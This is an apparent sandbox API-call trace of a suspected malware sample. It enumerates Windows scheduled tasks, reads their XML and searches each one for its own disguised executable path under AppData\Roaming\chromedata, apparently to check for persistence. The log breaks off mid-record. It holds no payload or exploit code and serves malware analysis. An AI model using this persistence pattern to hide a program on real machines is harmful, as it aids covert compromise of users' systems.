	[0073.629] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Shell\\WindowsParentalControls</URI>\r\n    <Source>$(@%SystemRoot%\\System32\\wpcumi.dll,-300)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\wpcumi.dll,-301)</Author>\r\n    <Description>$(@%SystemRoot%\\System32\\wpcumi.dll,-302)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>false</Enabled>\r\n      <Delay>PT1S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{DFA14C43-F385-4170-99CC-1B7765FA0E4A}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.630] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Shell\\WindowsParentalControls</URI>\r\n    <Source>$(@%SystemRoot%\\System32\\wpcumi.dll,-300)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\wpcumi.dll,-301)</Author>\r\n    <Description>$(@%SystemRoot%\\System32\\wpcumi.dll,-302)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>false</Enabled>\r\n      <Delay>PT1S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{DFA14C43-F385-4170-99CC-1B7765FA0E4A}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.630] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.630] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.630] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="WindowsParentalControlsMigration") returned 0x0
	[0073.630] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration</URI>\r\n    <Source>$(@%SystemRoot%\\System32\\wpcmig.dll,-300)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\wpcmig.dll,-301)</Author>\r\n    <Description>$(@%SystemRoot%\\System32\\wpcmig.dll,-302)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"System\">\r\n      <GroupId>S-1-5-18</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"System\">\r\n    <ComHandler>\r\n      <ClassId>{343D770D-7788-47c2-B62A-B7C4CED925CB}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.631] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration</URI>\r\n    <Source>$(@%SystemRoot%\\System32\\wpcmig.dll,-300)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\wpcmig.dll,-301)</Author>\r\n    <Description>$(@%SystemRoot%\\System32\\wpcmig.dll,-302)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"System\">\r\n      <GroupId>S-1-5-18</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"System\">\r\n    <ComHandler>\r\n      <ClassId>{343D770D-7788-47c2-B62A-B7C4CED925CB}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.631] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.631] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.631] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec8) returned 0x0
	[0073.631] ITaskFolderCollection:get_Count (in: This=0x55fec8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.631] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.631] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.631] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1e, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.631] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec8) returned 0x0
	[0073.632] IRegisteredTaskCollection:get_Count (in: This=0x55fec8, pCount=0x128e30 | out: pCount=0x128e30*=4) returned 0x0
	[0073.632] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.632] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="AutoWake") returned 0x0
	[0073.632] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\AutoWake</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{E51DFD48-AA36-4B45-BB52-E831F02E8316}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.632] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\AutoWake</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{E51DFD48-AA36-4B45-BB52-E831F02E8316}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.633] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.633] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.633] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="GadgetManager") returned 0x0
	[0073.633] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\GadgetManager</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>false</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <ComHandler>\r\n      <ClassId>{FF87090D-4A9A-4f47-879B-29A80C355D61}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.633] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\GadgetManager</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>false</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <ComHandler>\r\n      <ClassId>{FF87090D-4A9A-4f47-879B-29A80C355D61}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.634] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.634] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x3, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.634] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="SessionAgent") returned 0x0
	[0073.634] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\SessionAgent</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT15S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <ComHandler>\r\n      <ClassId>{45F26E9E-6199-477F-85DA-AF1EDfE067B1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.634] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\SessionAgent</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT15S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <ComHandler>\r\n      <ClassId>{45F26E9E-6199-477F-85DA-AF1EDfE067B1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.634] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.634] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x4, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.634] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="SystemDataProviders") returned 0x0
	[0073.634] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\SystemDataProviders</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT30S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      